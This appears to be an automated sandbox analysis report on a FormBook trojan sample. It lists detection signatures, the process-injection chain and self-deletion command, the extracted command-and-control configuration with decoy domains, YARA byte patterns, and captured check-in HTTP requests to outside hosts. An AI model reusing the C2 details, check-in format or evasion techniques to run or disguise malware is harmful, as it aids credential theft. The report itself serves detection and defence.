Loading ...

Play interactive tourEdit tour

Analysis Report DNPr7t0GMY

Overview

General Information

Sample Name:DNPr7t0GMY (renamed file extension from none to exe)
Analysis ID:432808
MD5:f41951980d050c8fe13c8a2e31e55b94
SHA1:58be890ff4d29b2d17566420c0e455dbfccda9a8
SHA256:12f07790ce9303ed023131642a93d1b62ce4f3d5db8d35ed215d5b2bddc4ff93
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DNPr7t0GMY.exe (PID: 6428 cmdline: 'C:\Users\user\Desktop\DNPr7t0GMY.exe' MD5: F41951980D050C8FE13C8A2E31E55B94)
    • DNPr7t0GMY.exe (PID: 6588 cmdline: C:\Users\user\Desktop\DNPr7t0GMY.exe MD5: F41951980D050C8FE13C8A2E31E55B94)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 5876 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 4768 cmdline: /c del 'C:\Users\user\Desktop\DNPr7t0GMY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.DNPr7t0GMY.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.DNPr7t0GMY.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.DNPr7t0GMY.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        4.2.DNPr7t0GMY.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.DNPr7t0GMY.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 5876

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: DNPr7t0GMY.exeVirustotal: Detection: 55%Perma Link
          Source: DNPr7t0GMY.exeMetadefender: Detection: 34%Perma Link
          Source: DNPr7t0GMY.exeReversingLabs: Detection: 60%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: DNPr7t0GMY.exeJoe Sandbox ML: detected
          Source: 4.0.DNPr7t0GMY.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.DNPr7t0GMY.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DNPr7t0GMY.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: DNPr7t0GMY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: DNPr7t0GMY.exe, 00000004.00000002.272130410.0000000002D50000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: DNPr7t0GMY.exe, 00000004.00000002.271750109.000000000113F000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DNPr7t0GMY.exe, 00000004.00000002.271750109.000000000113F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jrFIryXeZK\src\obj\Debug\AppDomainTimerSafeHandle.pdb source: DNPr7t0GMY.exe
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jrFIryXeZK\src\obj\Debug\AppDomainTimerSafeHandle.pdb,L source: DNPr7t0GMY.exe
          Source: Binary string: msdt.pdb source: DNPr7t0GMY.exe, 00000004.00000002.272130410.0000000002D50000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 199.195.117.147:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 199.195.117.147:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 199.195.117.147:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01 HTTP/1.1Host: www.yunlimall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=403u/w6B7XptcAEzuvN4cykoFcXgffqxcXNiYWMFmnIxKaVZCbECctw1BX3Z+wGMxAxa HTTP/1.1Host: www.painhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD8 HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6 HTTP/1.1Host: www.thriveglucose.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&1bs8=cR-P8LD8 HTTP/1.1Host: www.essentiallyourscandles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9OtfZIW5A7WG HTTP/1.1Host: www.ololmychartlogin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIDpWXBn/Ha HTTP/1.1Host: www.swayam-moj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&1bs8=cR-P8LD8 HTTP/1.1Host: www.brunoecatarina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 142.111.47.2 142.111.47.2
          Source: Joe Sandbox ViewIP Address: 23.82.57.32 23.82.57.32
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01 HTTP/1.1Host: www.yunlimall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=403u/w6B7XptcAEzuvN4cykoFcXgffqxcXNiYWMFmnIxKaVZCbECctw1BX3Z+wGMxAxa HTTP/1.1Host: www.painhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD8 HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6 HTTP/1.1Host: www.thriveglucose.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&1bs8=cR-P8LD8 HTTP/1.1Host: www.essentiallyourscandles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9OtfZIW5A7WG HTTP/1.1Host: www.ololmychartlogin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIDpWXBn/Ha HTTP/1.1Host: www.swayam-moj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&1bs8=cR-P8LD8 HTTP/1.1Host: www.brunoecatarina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: unknownDNS traffic detected: queries for: www.yunlimall.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Jun 2021 17:13:43 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000005.00000000.241683015.0000000008A05000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: http://instagram.com/casarpontocom
          Source: DNPr7t0GMY.exe, 00000002.00000002.220254281.00000000032E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: http://www.pinterest.com/casarpontocom
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://casarpontocom.zendesk.com/hc/pt-br
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://embed.typeform.com/embed.js
